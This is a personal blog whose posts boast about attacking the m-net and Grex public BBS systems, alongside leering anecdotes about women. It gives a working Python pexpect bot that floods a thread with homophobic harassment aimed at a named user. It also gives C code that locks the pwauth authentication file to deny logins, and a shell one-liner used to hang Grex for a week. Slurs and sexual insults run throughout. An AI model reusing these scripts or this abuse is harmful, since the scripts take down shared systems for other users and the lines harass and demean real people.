Flooding the m-net BBS

December 28, 2010

History
Once upon a time I got banned from m-net for computer hacking. Then, maybe like a week ago, the powers that be let me back on the system. I noticed right away that nothing changed. All I saw were a bunch of hose head “IT Professionals” gloating about all their wonderful work experience. Yet the same old crappy software bugs still existed. Then I started to wonder out loud “What good is all the fucking professional IT experience if you can’t even fucking fix the damn software on this site. I mean, it’s not the the admins are telling you no. In fact, the three stooges that run this dump actually encourage people to do software patches on the system.”

So after like 2 hours on the BBS, I was once again having war of the words in the regulars. I would call some of the regulars “fat and bald”. And in return, they would call me “A drunk pervert that has confessed to wearing pantyhose out in public.”

There was one particular jerk off IT professional that really irked me. I kept telling this homo to go fuck off. But yet, he still argued with me. So I got fed up and wrote a BBS respond flooder. Basically, more or less, the script would automatically do a shit load of responses in any given thread. Ie a topic.

For example, Here would be a list of threads…

1 48 welcome to the december general conference item
2 4 december system problems item
3 250 december announcements item
4 2 december other conferences on m-net item
5 62 december happy item

Thread 5 would be the “december happy item”. The number 62 would represent the number of actual responses, by various users, in thread number 5.

The lead up to the abuse
For whatever reasons, this ‘IT Professional, whom I shall refer to as the “homosexual ninny from england”, was really annoying me in thread 125. So I unleashed my script on this thread. Here is what the thread looked like..

125 1833 What would you buy Julian Assange for Christmas?

That’s right. There were over 1800 responses in that thread. And is part out the output from the script itself..

Item 125 entered Sat, Dec 18, 2010 (15:29) by Sam (chiquita)
What would you buy Julian Assange for Christmas?

1816 new of 1833 responses total.

#18 Proud wife beater (duality) Sat, Dec 18, 2010 (18:56):
mart isnt bright

#19 Proud wife beater (duality) Sat, Dec 18, 2010 (18:56):
mart is a homosexual

#20 Proud wife beater (duality) Sat, Dec 18, 2010 (18:56):
mart takes it up the ass from cross

#21 Proud wife beater (duality) Sat, Dec 18, 2010 (18:57):
mart can go fuck off

#22 Proud wife beater (duality) Sat, Dec 18, 2010 (18:57):
mart is a queer ass virgin

#23 Proud wife beater (duality) Sat, Dec 18, 2010 (18:57):
mart is a fag

Shortly after this happened, I was got all these lame accusations that I was just doing some kind of copy and paste job. So to rebuke all these fags, I posted the entire working code on this site. And here it is…

#----------------------------------------------------------
#The script starts in non-interactive mode (aka bot mode).
#Press ctrl-c to get into interactive mode and 'ctrl ^]' to
#get back into non-interactive mode.
#
#And now a few comments...
#
#a)The script only works on the Linux Operating System.
#  This is because the program relies on the concept of a
#  "psuedo terminal". As far as I know, the closest you
#  can get to a "psuedo terminal" in Windows is using something
#  like cygwin.
#
#b)Using something like 'ctrl ^]' to get back into non-interactive
#  mode is something that is mentioned python pexpect module,
#  but not in the actual pexpect document itself. 
#
#---------------------------------------------------------

import pexpect, time, signal, getpass

#I need a large list of profanity because the computer doesn't always
#follow the Gaussian Probability curve.

profanity = ["mart is a fag", "mart is a homo", "mart is dumb",
             "mart is a retard", "mart is a moron", "mart is stupid",
             "mart is a virgin", "mart is gay", "mart isnt witty",
             "mart sucks dans dick", "mart sucks his moms dick",
             "mart can go fuck off", "mart likes little boys",
             "mart isnt bright", "mart is a homosexual",
             "mart takes it up the ass from cross", "mart can go fuck off"]

x = 1

def mode(sig, data):
    global x
    x = x + 1
    
def get_name():
    user = raw_input("Username: ")
    password = getpass.getpass("Password: ")
    idle(user,password)
    
def idle(user,password):
    y = 1
    max = len(profanity)
    count = 0
    
    bbs = pexpect.spawn('telnet arbornet.org')
    bbs.expect('login:')
    bbs.sendline(user)
    print bbs.before,bbs.after,
    bbs.expect('[Pp]assword:')
    bbs.sendline(password)
    bbs.sendline('\n')
    bbs.sendline('bbs')

    while bbs.isalive():
        if ((y % x ) == 0):
            bbs.expect('Ok: ')
            bbs.sendline('r noresp 125')
            bbs.expect('Respond or pass?')
            bbs.sendline('r')
            bbs.expect('>')
            if count < max:
                bbs.sendline(profanity[count])
                count = count + 1
            else:
                count = 0
                bbs.sendline('mart is a queer ass virgin')
            bbs.sendline('.')
            time.sleep(5)
        else:
            bbs.interact()
            y = y + 1
        
if __name__ == "__main__":
    signal.signal(signal.SIGINT, mode)
    get_name()        

The actual deleting of the BBS item
So I began to wonder if I could max out the number of responses in any given thread. And if so, what would happen. This line of thinking stems from freshman level Calculus at UW. You see, I had professor that always told us “All the interesting math happens at the boundaries of a function.” So, uhhh…, like… I just extended this concept to the realm of computer programming. I swear to god this isn’t made up. Quit laughing and fucking give me some mother fucking support.

So I ran the script for like maybe 90 minutes. After that, I got the following error messages on my computer…

[cdalten@localhost oakland]$ ./mnut.py
Username: duality
Password:
Trying 69.39.89.95…
Connected to arbornet.org (69.39.89.95).
Escape character is ‘^]’.

FreeBSD/i386 (m-net.arbornet.org) (ttypn)

login:
Traceback (most recent call last):
File “./mnut.py”, line 97, in ?
get_name()
File “./mnut.py”, line 45, in get_name
idle(user,password)
File “./mnut.py”, line 82, in idle
bbs.expect(‘>’)
File “/usr/lib/python2.4/site-packages/pexpect.py”, line 1311, in expect
return self.expect_list(compiled_pattern_list, timeout, searchwindowsize)
File “/usr/lib/python2.4/site-packages/pexpect.py”, line 1325, in expect_list
return self.expect_loop(searcher_re(pattern_list), timeout, searchwindowsize)
File “/usr/lib/python2.4/site-packages/pexpect.py”, line 1409, in expect_loop
raise TIMEOUT (str(e) + ‘\n’ + str(self))
pexpect.TIMEOUT: Timeout exceeded in read_nonblocking().

version: 2.3 ($Revision: 399 $)
command: /usr/kerberos/bin/telnet
args: [‘/usr/kerberos/bin/telnet’, ‘arbornet.org’]
searcher: searcher_re:
0: re.compile(“>”)
buffer (last 100 chars): ? r
Too many responses on this item!

Respond or pass?
before (last 100 chars): ? r
Too many responses on this item!

Respond or pass?
after: pexpect.TIMEOUT
match: None
match_index: None
exitstatus: None
flag_eof: False
pid: 30555
child_fd: 3
closed: False
timeout: 30
delimiter: pexpect.EOF
logfile: None
logfile_read: None
logfile_send: None
maxread: 2000
ignorecase: False
searchwindowsize: None
delaybeforesend: 0.05
delayafterclose: 0.1
delayafterterminate: 0.1

Basically, I had entered in too many responses in thread 158. Uhh… yeah, more or less I tested my theory on thread 158. Why that thread? I have no idea. I was fucking drunk at the time, and uh like, I just sounded like the cool thing to do.

And here is what happened when I logged into the system to manually enter a response…

#1999 Proud wife beater (duality) Sun, Dec 26, 2010 (13:12):
MART IS GAY

Respond or pass? r
Too many responses on this item!

That’s right, The m-net bbs wouldn’t let me enter in response number 2000.

I saw the following when I looked looked at the threads on m-net…

158 1999 What did you get, fuckers?
159 5 Why the Hell didn’t she just call her neighbors?
160 0 The cat was allowed back upstairs after being the basement for two days. He is not quick to forgive…

Ok:

And then, when I browsed the threads again, I saw the following..

m-net% bbs
YAPP 3.1.1 Copyright (c)1995 Armidale Software
Registered to: Arbornet
Invalid format of sum file

155 2 ho hoe whoe
156 10 oy vey
157 7 ho rudolph red nosed reindeer got his red nose

Ok:

155 2 ho hoe whoe
156 10 oy vey
157 7 ho rudolph red nosed reindeer got his red nose
161 0 Nice censorship

Ok:

Threads 158 (the one I maxed out the responses with), 159, and 160 got deleted.

At first I thought the m-net admins just deleted the shit. But they told me no. So when I asked what happened, they told me it was a “system glitch”.

The aftermath
I’ve had a few people ask me to explain how the code works. I refuse to do that since I couldn’t do any justice to the explanation. I would say use google, but like googling isn’t enough. Instead, let me cite one of the comments made in one of the python modules used in this code..

[cdalten@localhost ~]$ more /usr/lib/python2.4/pty.py
“””Pseudo terminal utilities.”””

# Bugs: No signal handling. Doesn’t set slave termios and window size.
# Only tested on Linux.
# See: W. Richard Stevens. 1992. Advanced Programming in the
# UNIX Environment. Chapter 19.
# Author: Steen Lumholt — with additions by Guido.

The book is kind of expensive, hard to find, and not exactly easy to read. But I still feel that’s better than some half baked moronic response found on some loser unix forum site dominated by a bunch of moron “IT professionals” who have zero academic publications to their name.

More adventures with the 59 year old neighbor girl

November 5, 2009

Okay,so last Saturday afternoon I went over to the 59 year old chicks place to ask her if she knew when the bay bridge was going to re-open. She says “Maybe sometime next week.” She goes on to say “I know you go to city a lot on the weekends.” Right after this, I leave her place. On my way back, I see the dude that lives below me, sitting outside smoking.

I said “I find this kind of creepy that the neighbor girl knows when I come and go.”
He says “Maybe she likes you.”
I said “I think this chick is stalking me.”
I went on to say “She knows that I go to San Francisco on the weekends.”
He says “Maybe you told her.”
I said “That’s impossible because every time I go over there to ask her ask her about something, she just ends up rattling about wooden floors. In other words, I haven’t really told her sh-t.”

We exchange a few more words before he says “Hey, if you like her, just don’t tell her. She will get scared if you ask her if she has a boyfriend.” I then asked “What if I ask her about sex?” He just raises hands and then walks away from me.

Okay, so this brings me up to last night. I was reading lying on my bed reading “Then We Came to the End” by Joshua Ferris. On page 40 there is a passage that says “Some people actually generate revenue around here, you handjob.”

So I started wondering if this chick would really get offended if I asked her about sex. Deep down inside I keep hoping that maybe she will get fed up with me to the point that she will stop staring at me. Anyways, I go next door and ask “Hey Meg, can you tell me the meaning of this word in the passage.” She looks over at the book and I point at the word “handjob.” She just goes silent and then her lips do this weird pucker.

She goes “Uhh…”
I ask her “Is this a naughty word?”

She goes silent again.

Then I say “The last time I saw a strange words like this was when I took a French Literature class at UW back in the stone age.”

Still no response

I go “Yeah, I took the class because I wanted to meet more chick.”

Right after that comment, she closes the door on me and then shuts off her front porch light.

I saw ’00’ Fleming play at 1015 last Saturday night.

October 29, 2009

I saw European Trance artist known as ’00’  Fleming play at this club called 1015 in downtown San Francisco last Saturday night. I wanted to check him out in concert because I like his music that I hear on di.fm. I really wasn’t expecting to see that many people there because, while he is known in England, he isn’t known in the United States. On top of that, I don’t recall any radio station actually advertising the event. However, when I got there at 10pm, the line was already two blocks back. So I guess the guy is more popular that what I had initially thought

The whole thing your typical west coast concert/rave. The guy didn’t actually start playing until like 1:30am. By then, the candy kids (aka glow stick people) were out in force on the  dance floor. Security just pretended to check for drugs. Ie they would go up, see someone doing something, and then just look around like they didn’t see anything until the person hid the drugs. Right after that, security just walked away.

Yeah, I also saw girls kissing girls.  And for whatever reasons, a lot of the lesbians were wearing thigh high stockings, without a garter belt, and a short skirt. The skirt itself never hide the stockings. The last time I saw this kind of fashion trend was back when I used to go up to the ‘Option’ in Green Bay, Wisconsin back in 10th and 11th grade when I was still living in Neenah, Wisconsin.

I think that my female co-worker might be a ho.

October 27, 2009

So we got this new girl at work sometime last week. I’ve only talked to her a few times. And every time we do talk, the subject seems to be about her Korean friend. Anyways, today, I took break around 2:15pm. I was starting to walk outside when she comes running up to me and asks me if I was going to be outside for break. I just said “Yes.” I was thinking “Oh geeze, she is gonna spend the entire break talking about her Korean friend again.”

So she sits down by me at the break table and then calls her boyfriend. I think her boyfriend and Korean friend are two different people. I think. A few minutes later she hangs up the phone and then asks me if I wanna see her tattoo. Even before I could say yes, she breaks out her cell phone, and I see a picture of a tattoo on her back. This isn’t really that amazing. What sort of took me back was the she was only wearing a black thong in that photo. And this wasn’t a distant shot either. I could clearly see part of her left boob in that photo. Right after that, I get up and go back inside.

She follows right behind me and pretty much followed me around like a lost puppy at work before my manager came up and made her do something else. Now right before I left, she ends up stretching right by me. Her shirt kind of lifted up as she streched out, thereby exposing her red thong that she was wearing under her black pants. I saw it and she noticed that I saw it. But instead of pulling up her pants, she just kind of giggled and then walked away from me. I almost find this kind of hot. Almost.

Dealing with the 59 year old neighbor chick.

October 24, 2009

This chick is worth a blog entry because she is the only woman that has ever gone out of her way to make sure that I make eye contact with her when we are both outside….

Okay, so this is how I actually met this chick. I had just gotten back to my place one Sunday evening after spending the day in San Francisco. I had parked my car a few houses away from my place because I couldn’t find a parking spot on my street. It turned out that I ended up parking my car in front of the 59 year old chicks house. Anyways, I had noticed someone starting at me. This chick, for whatever reasons, had stopped what she was doing on her porch, and was staring at me. I looked up and she just said “Hey.” and then went back to what she was doing. I found this kind of odd.

The next run in with this chick came a few weeks later.  I was getting back home from doing laundry one Sunday afternoon. Right after I park my car, she comes driving up, and parks her car in front of my car. This chick then gets out of her car, and then just stares at me while I get the laundry basket out of my car. I didn’t look up because I knew she was starting at me. This chick then repositions herself so that I could see her child like boobies. I swear to god this isn’t made up. So I finally broke down and looked up at her. She just said “hey” and then she walked up to her house.

Shortly after this incident I just decided to go over and introduce myself to her. I just assumed that the reason she kept staring at me was because she wanted to talk to me. Anyways, I noticed this chick wasn’t big on the conversation thing. I figured that she was shy. A few days later, I asked my landlord about her. He just told me that she was just some recluse. I then asked the guy below me about her. He said “This chick is a nut. Stay away from her.”

This should have ended there. But for whatever reasons, this chick continued to stare at me every time she saw me outside. I got the impression that she wanted me to ask her something. I thought “I bet she wants to ask me out on a date or ask me to do something with her.” The only reason this thought crossed my mind because the first time that I talked to her, I mentioned that my friend would sometimes give me a ride to Applebees when I’m drunk. I remember her smiling and then saying “Applebees is a nice place to go to for dinner.” However, I never asked her to go there with me because this chick is old enough to be my mother. Seriously.

So over the course of the next year, I would just continue to stop by her place. I figured that maybe she would stop staring at me once she got to know me. In some respects, the staring has kind of ceased. Also, the conversations are longer. I mentioned to my landlord and he was kind of shocked. He asked “What? You managed to get more than two words out of this woman?” I told him “Yeah.”

Maybe the only thing that I find creepy is that she apparently knows my work schedule. Also, for whatever reasons, she must think that I also know her work schedule. This is because, every once in a while when I talk to her, she mentions “I hope the noise by your place doesn’t keep you awake because I know you leave for work early in the morning.”  She then goes on to say “As you probably know, there are some nights that I don’t get home until around 10pm.” I told her “No, I wouldn’t know this because most of the time I’m asleep by 9pm.”

How the m-net web BBS went down in 27 lines of C code

October 22, 2009

A Brief History of the Abuse
I think it was maybe around June of 2009 that web BBS (Bulletin Board System)portion of m-net went screwy. What would happen is that a user would enter their login name and correct password, but for whatever reasons, the system wouldn’t let them on.

Anyways, the homosexual Indian of m-net had decided to take a break from his $8.00/hr gardening job and then tried to figure out what was going on. He reasoned out that the source of the problem was me locking the pwauth.lock file. Ie, the file that controls password authentication for the web BBS on m-net.

Not only was he wrong, but it turns out that if a person places a lock over the pwauth.lock file, the m-net web BBS will stop taking requests. I guess it could maybe be considered a denial of service attack. So I ended up doing a proof of concept attack. I wrote the code in C so that the m-net staff couldn’t see the source code to the executable file. Below is the code that I used to demonstrate the attack. All I did was just compile and run it from the m-net shell.

#include <stdio.h>
#include <stdlib.h>

#include <fcntl.h>
#include <unistd.h>

#define BBS "/var/run/pwauth.lock"

int main(void) {
  int fd;

  if ((fd = open(BBS, O_RDONLY)) < 0) {
    fprintf(stderr, "Unable to open pwauth file\n");
    exit(EXIT_FAILURE);
  }

  if (flock(fd,LOCK_EX) == -1) {
    fprintf(stderr, "Unable to acquire lock\n");
    exit(EXIT_FAILURE);
  }

sleep(9999999);

close(fd);

exit(EXIT_SUCCESS);
}

Grex Grep Bug

October 22, 2009

Note: This bug doesn’t work on m-net. I verified this one day when tonster stepped away from the terminal so that he could have mad cybersex with trex.

Prelude
During January 2008 I was struggling to learn the concept of a Unix device driver. I think it was Barry out at MIT that told me the behavior of /dev/tty and the behavior of /dev/null were two different things. I was sort of mystified, so I just started playing with /dev/null. During one of my late night adventures I found out that

cat < /dev/zero > dev/null

ended up consuming 99% cpu time on my both Linux box and the Grex OpenBSD box. This shell combo by itself had no great impact on either systems because most Unix variants are I/O bound (vs cpu bound). I think this is the official starting point of what would later become known as the grep bug.

The lead up to the bug
I ended up asking about this behavior on comp.unix.questions. Here is the URL to that thread

Understanding /dev/null

Someone I knew read this thread and then modified it to the following

cat < /dev/zero | grep “f” > /dev/null &

I only found this out because this person was lagging Grex. Here is a copy of the email I got from him regarding the lag.

“whoa !

cat < /dev/zero | grep “f” > /dev/null &

run that a few times. maybe like 10 or so. it’s fun! thanks for the inspiration!

On 1/27/08, C D wrote:

> > load averages: 16.29, 15.21, 13.76 18:41:51
> > 323 processes: 314 idle, 7 stopped, 1 zombie, 1 on processor
> > CPU states: 25.0% user, 0.1% nice, 12.4% system, 1.0% interrupt, 61.5%
> > idle
> > Memory: Real: 176M/373M act/tot Free: 125M Swap: 342M/2048M used/tot > >
> > PID USERNAME PRI NICE SIZE RES STATE WAIT TIME CPU COMMAND
> > 4372 naftee -5 0 164M 146M sleep biowai 84:25 8.01% grep
> >
> >
> > What was the magical shell command to do this? > >
> >”

Basically, he didn’t realize that the modified shell combo caused the system (ie Grex) to slow down.

The attack and the aftermath
I had theorized that if someone would run 15 of these at once, they could effectively cause the entire system to hang. One of my friends actually put this theory to test. The end result was that he was able to take Grex offline for about a week. Once the system came back up, the Grex Users saw the following

login: mickeyd
Password:

Grex was down because a few sociopathic individuals have taken a great delight in exploiting a bug in the op system. This requires no great skill, just a deformed soul. Grex will be back up later today (thurs). STeve

Connection to grex.org closed by foreign host.

Life After Being Banned from M-net.

October 22, 2009

It’s been a little bit over a week since I got banned from M-net for computer hacking.  I thought about it and decided to never do this kind of stuff again.

So why did I start computer hacking in the first place? At first, it was the challenge. I saw m-net, and grex, as this vast public bbs system that was powered by some of the most original software that I had seen up to that point in my life. I just remember being in total awe. I was like “Wow, this is really f-cking cool. I really don’t this place for the IRC. The software that powers this joint looks far far more interesting.”

Then I started to learn the quirks in the system. I found out that some of these quirks could be used to halt parts of the system. This was ultimate adredenline rush for me. I had finally found a way channel all my anger, from my personal issues, via computer hacking. But this is when things got bad. I started to abuse the system to prevent users that I didn’t like from actually using m-net. Right before I had got banned, this person on m-net called slack told me try and vent my anger and aggression through a guitar vs computer hacking before I ended up in legal trouble.

I guess I should have taken her warning. Because shortly after her warning, this whole thing got so out of control that m-net banned me and then threatened to prosecute me for computer hacking.

So now, I’ve just decided to blog for the time being. I don’t know how long this will last. In between, I’ve also been trying to get help with some of my personal issues before I really do something that will land me in jail.